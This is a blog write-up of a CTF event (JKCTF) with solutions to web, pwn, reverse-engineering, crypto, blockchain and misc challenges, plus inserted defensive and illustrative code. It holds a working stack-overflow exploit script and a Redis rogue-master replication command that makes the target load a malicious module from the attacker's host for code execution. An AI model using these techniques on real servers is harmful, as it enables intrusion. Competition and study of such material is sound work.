web

flag~is_here

The hint says the flag submission box is gone, but the flag itself is given. So go to another challenge's submission box, capture the request there, look at its shape and send the same kind of request yourself. Anyone who has brute-forced flags before will think of this right away. Another solution is to restore the submission box.

You can see that the submission box was not actually deleted, only commented out.

Unfortunately, that only restores its appearance, not its function.

Capturing a request shows that submitting a flag actually sends a JSON string to /api/v1/challenges/attempt containing the challenge id and the flag value. So all we need is this challenge's id, and then we can submit the flag correctly.

With the browser's network capture open, I noticed a 40 appear; that is probably it.

The 38 that follows confirms this nicely.

ez_Redis

ip:121.5.169.223
port:39379
do you know how to operate redis and get the flag?

nc 121.5.169.223 39379

Just connect with nc.

It turns out that Redis commands can be executed directly here: we send raw Redis commands and interact without the protocol layer. I remember that when I was doing this challenge there was a key x whose value was a reverse shell bouncing to the local Redis, so we can interact with the internal Redis server without using any protocol at all.

At this point Redis master-slave replication comes to mind. Roughly, your VPS acts as the master and the challenge's Redis as the slave; the master is responsible for writing a file and the slave for reading it, which lets you upload a malicious .so and finally achieve RCE.

For details see this article: https://paper.seebug.org/975/

After that it is just a matter of running the script: https://github.com/n0b0dyCN/redis-rogue-server

python3 redis-rogue-server_5.py --rhost 121.5.169.223 --rport 39379 --lhost xxxxx --lport 8081
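As an added defensive counterpart to the technique above (example code written for this edit, not part of the original writeup or of the linked tool), the following script parses Redis MONITOR output and flags the command sequence a rogue-master replication attack leaves behind: replication pointed at an outside host, a persistence target change, and a runtime module load from one client. The sample MONITOR lines are constructed; the addresses and file names in them are placeholders.

```python
import re
from typing import Dict, List, Optional, Tuple
# One Redis MONITOR line: <unix-ts> [<db> <client-ip>:<port>] "CMD" "arg" ...
MONITOR_RE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.+)$')

def parse_monitor_line(line: str) -> Dict[str, object]:
    """Split one MONITOR line into timestamp, client and argument list; {} if malformed."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return {}
    args = re.findall(r'"((?:[^"\\]|\\.)*)"', m.group(4))
    return {"ts": float(m.group(1)), "client": m.group(3), "args": args}

def classify(args: List[str]) -> Optional[str]:
    """Describe one command if it belongs to the rogue-master pattern, else None."""
    cmd = args[0].upper() if args else ""
    if cmd in ("SLAVEOF", "REPLICAOF") and len(args) >= 3:
        # "SLAVEOF NO ONE" only promotes this node; anything else points it at a master
        if [a.upper() for a in args[1:3]] == ["NO", "ONE"]:
            return None
        return "replication redirected to %s:%s" % (args[1], args[2])
    if cmd == "MODULE" and len(args) >= 3 and args[1].upper() == "LOAD":
        return "module loaded at runtime: %s" % args[2]
    if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET" \
            and args[2].lower() in ("dir", "dbfilename"):
        return "persistence target changed: %s=%s" % (args[2], args[3])
    return None

def detect_rogue_replication(lines: List[str]) -> Tuple[List[Tuple[str, str, str]], List[str]]:
    """Return (findings, clients): each suspicious command, plus the clients that both
    redirected replication and loaded a module in the same capture (the full chain)."""
    findings, seen = [], {}
    for line in lines:
        rec = parse_monitor_line(line)
        label = classify(rec["args"]) if rec else None
        if label:
            cmd = rec["args"][0].upper()
            findings.append((rec["client"], cmd, label))
            seen.setdefault(rec["client"], set()).add(cmd)
    chained = sorted(c for c, cmds in seen.items()
                     if cmds & {"SLAVEOF", "REPLICAOF"} and "MODULE" in cmds)
    return findings, chained

# Constructed sample MONITOR output (not captured from the challenge): a benign read,
# one client running the replicate-then-load chain, and one legitimate promotion.
SAMPLE = """\
1650000000.100000 [0 10.0.0.5:40000] "GET" "x"
1650000001.200000 [0 10.0.0.7:40111] "SLAVEOF" "203.0.113.10" "8081"
1650000001.300000 [0 10.0.0.7:40111] "CONFIG" "SET" "dbfilename" "exp.so"
1650000002.400000 [0 10.0.0.7:40111] "MODULE" "LOAD" "./exp.so"
1650000003.500000 [0 10.0.0.9:40222] "SLAVEOF" "NO" "ONE"
""".splitlines()
```

Feed it real `redis-cli MONITOR` output (or a command log) and alert on any client that appears in the chained list.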

pwn

pwn2

139.196.175.134,10001

nc 139.196.175.134 10001

The challenge says there is no attachment.

The hint says you only get the flag if you use pwntools.

So just go straight at it with pwntools.

from pwn import *
context.log_level = "debug"
f = remote('139.196.175.134', 10001)
f.interactive()

With debug mode on, a base64-encoded string shows up in the output.

ZmxhZ3toZWxsb19wd250b29sc30=

pwn1

139.196.175.134,10000

nc 139.196.175.134 10000

It is a stack overflow challenge: sending 20 a's causes an overflow.

Checked the binary: 32-bit, no packer.

Drag it into IDA and take a look.

Follow the vul function.

It defines a 16-byte string buffer and reads into it with gets.

To push the return address out, we need 20 bytes of padding (the 16-byte buffer plus the 4-byte saved ebp).

Then check whether there is a function that spawns a shell.

0x080484EB

exp

from pwn import *

context.log_level = "debug"
f = remote('139.196.175.134', 10000)
offset = 20              # 16-byte buffer + 4-byte saved ebp
backdoor = 0x080484EB    # address of the shell function found in IDA
payload = b'a' * offset + p32(backdoor)

f.sendline(payload)
f.interactive()

re

easyRE

64-bit, no packer.

There is a condition check; follow it in.

It is a big pile of conditions that do arithmetic on each byte of the 7-character input. Just throw it at the z3 library.

from z3 import Int, Solver, sat

s = Solver()
# one integer variable per byte of the 7-character input
flag = [Int("flag[%d]" % i) for i in range(7)]
v1 = flag[4]
v2 = flag[1]
v3 = flag[3]
v4 = flag[0]
v5 = flag[5]
v6 = flag[2]
v7 = flag[6]
# the seven conditions lifted from the binary's check function
s.add(546 * v7 + 34 * (v4 + v3) + 454 * (v2 + v1) - 54 * (v6 + v5) == 159106)
s.add(86 * v7 + 34 * (v3 + v2) + 3 * (v4 + 2 * v5) - 454 * v1 - 4 * v6 == -32346)
s.add(34 * v2 + 134 * v4 + 46 * v7 + 74 * (v3 - v5) - 154 * v6 + 44 * v1 == 12196)
s.add(84 * v2 + 146 * v7 + 54 * (v1 + 6 * v4 + v3) - 524 * v6 - 44 * v5 == 11046)
s.add(154 * v1 + 74 * v2 + 547 * v7 + 44 * (v4 + v3) - 84 * v6 - 34 * v5 == 88328)
s.add(254 * v1 + 554 * v2 + 545 * v7 - 14 * (v6 + v5) - 4 * v4 - 34 * v3 == 143708)
s.add(34 * v2 + 134 * v3 + 4 * (6 * v4 + 11 * v1 + 61 * v7 - v5) + 54 * v6 == 60506)
if s.check() == sat:
    m = s.model()
    print(m)
    # the model gives flag = [104, 101, 108, 108, 111, 95, 122]
    print("".join(chr(m[v].as_long()) for v in flag))

crypto

crypto RSA's gift

This is a reused challenge, NPU's from last year, and it is even a bit easier than the original because the range was made smaller. What it mainly tests is covered here:

https://blog.csdn.net/weixin_44017838/article/details/106433677

The exp is as follows.

import gmpy2
from Crypto.Util.number import long_to_bytes

e = 8194
n = 16318078802588665472473623743437028192432903482106595341598932241542827303636397913013840952532302955671506620175759299228009074865839533016190944109393688073911129627195537680863581478487663662787710029252139493173787648170797475515410653436280938068936792755639336202221331824271376937191942575994271957722341525770080402243956741694887965401965295705598375158691488584112974104400455282295976772033226185652422147423889336285476661877460578489825604397795882757654795348072743715620125986360832511296948304527312260110382391185704767871191856807271112991309020058674595082459508005657307422851976862009399282269359
gift = 8159039401294332736236811871718514096216451741053297670799466120771413651818198956506920476266151477835753310087879649614004537432919766508095472054696844036955564813597768840431790739243831831393855014626069746586893824085398737757705326718140469034468396377819668101110665912135688468595971287997135978861042863969244364702850842076935869537754939731911431260475620566598820825058735036650655218713375228265555770313404136756057822451491541567430451617964323188578255369337944440379199054718721778556816771709864280129613589221737926525717410972778047365763570555977183025573956934920189555341618606514798156287080
c = 1541551233517734292638316996873398297516166502999168299751809560118164061243627554473828110461089089041311327713595921859350154568517387539154115983068910498219713309326052973113808966221136074135351820592496123629720455295129985026163373716868889298502047112519782957028609657329752355497729822476608896054826298262144514035273799710243327701109070092823008877080857703312698380022077081385997351735429485313381218570416260693439554317155978163612122373160900807689521818213514901894436625730658428868625588271559260495578031026827864238617206911506669598687998912626763233427065197086697228346385436971360108898381
# compare bit lengths: gift is on the order of phi(n)
print(len(bin(gift)[2:]))
print(len(bin(n)[2:]))

# e = 2 * 4097 is even, so it has no inverse mod phi; inverting e/2 instead
# recovers m^2 mod n, and the integer square root gives m.
for i in range(1, 4):
    phi = i * gift
    try:
        d = gmpy2.invert(e // 2, phi)
    except ZeroDivisionError:
        # e/2 has no inverse modulo this candidate phi
        continue
    m_2 = pow(c, int(d), n)
    root, exact = gmpy2.iroot(m_2, 2)
    if exact:  # only a perfect square can be the real m^2
        print(long_to_bytes(root))
        print(i)
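As an added illustration of why the exp above inverts e/2 and then takes a square root (example code written for this edit, not the author's), here is a toy RSA instance with the challenge's e = 8194 and two constructed Mersenne primes; it uses the true phi(n) rather than the challenge's gift, and also shows what happens once m^2 no longer fits below n.

```python
from math import gcd, isqrt
from typing import Optional

# Toy parameters constructed for this example (not the challenge's values): two
# Mersenne primes, so n is ~188 bits and a short message squared still fits below n.
p = 2**127 - 1
q = 2**61 - 1
n = p * q
phi = (p - 1) * (q - 1)
e = 8194  # the challenge's public exponent, 2 * 4097; gcd(e, phi) == 2 here

def encrypt(m: int) -> int:
    return pow(m, e, n)

def decrypt_even_e(c: int, phi: int) -> Optional[int]:
    """Recover m when gcd(e, phi) == 2, the situation the challenge script relies on.

    e has no inverse mod phi, but e/2 does. With d = (e/2)^-1 mod phi,
    c^d = m^(e*d) = (m^2)^((e/2)*d) = m^2 (mod n). While m^2 < n the modular
    result is the true square, so isqrt() returns m; once m^2 wraps around n
    the result is (almost surely) not a perfect square and we return None.
    """
    if gcd(e, phi) != 2:
        raise ValueError("this trick only applies when gcd(e, phi) == 2")
    d = pow(e // 2, -1, phi)
    m2 = pow(c, d, n)
    m = isqrt(m2)
    return m if m * m == m2 else None

def recover(msg: bytes) -> Optional[bytes]:
    """Encrypt msg, then run the even-e recovery; None if the square wrapped."""
    m = decrypt_even_e(encrypt(int.from_bytes(msg, "big")), phi)
    return None if m is None else m.to_bytes(len(msg), "big")
```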

blockchain

nc 121.5.169.223 39149

Information gathering

[$] Welcome to the game

We design a pretty easy contract game. Enjoy it!
1. Create a game account
2. Deploy a game contract
3. Request for flag
4. Get source code
Game environment: rinkeby
Option 1, get an account which will be used to deploy the contract;
Before option 2, please transfer some eth to this account (for gas);
Option 2, the robot will use the account to deploy the contract for the problem;
Option 3, use this option to obtain the flag after the event is triggered.
You can finish this challenge in a lot of connections.
[-]input your choice: 1
[+]Your game account:0xF947DEa9728ed8b74616cB145Ed11Ed7E595e6Fa
[+]token: 3qmK53QZD/2bgsT+gu+1YBL2uWv+bqpHauGcBTUZt5lN78uWWJaR9w6pBsmyGwONs3GnkIWhThiAcBb2HnjZJToDb9Jjw/Fg6ZddzBZb4xv9mwzjmb1Am+IOQEhHjT77em1V1TCb+r6/PQ88jpfDsNa/KVXPmGQFpS2b/R2MxGo=
[+]Deploy will cost 98153 gas
[+]Make sure that you have enough ether to deploy!!!!!!

[-]input your choice: 4
pragma solidity ^0.5.10;

contract Feng {
    event SendFlag(address addr);
    function getFlag() public {
        emit SendFlag(msg.sender);
    }
}

Couldn't do it, gave up.

misc

海明?威

Obviously there are only twelve possibilities, and brute-forcing them would take about a minute, but I guessed instead and got it on the third try.

Looking at the title 海明?威 (Hemingway), the third character has been replaced by a question mark, which means the third position is the one that was modified.

That leaves only three cases. I tried each group, and the flag was correct on the third attempt, so the answer to this challenge is 3 3: the third position of the third group.

Nothing more to say.

Last modified: 25 July 2022
Author:
Title: JKCTF
URL: https://pysnow.cn/archives/108/
Copyright: unless otherwise noted, this post is original to Pysnow's Blog; please keep the source when reposting.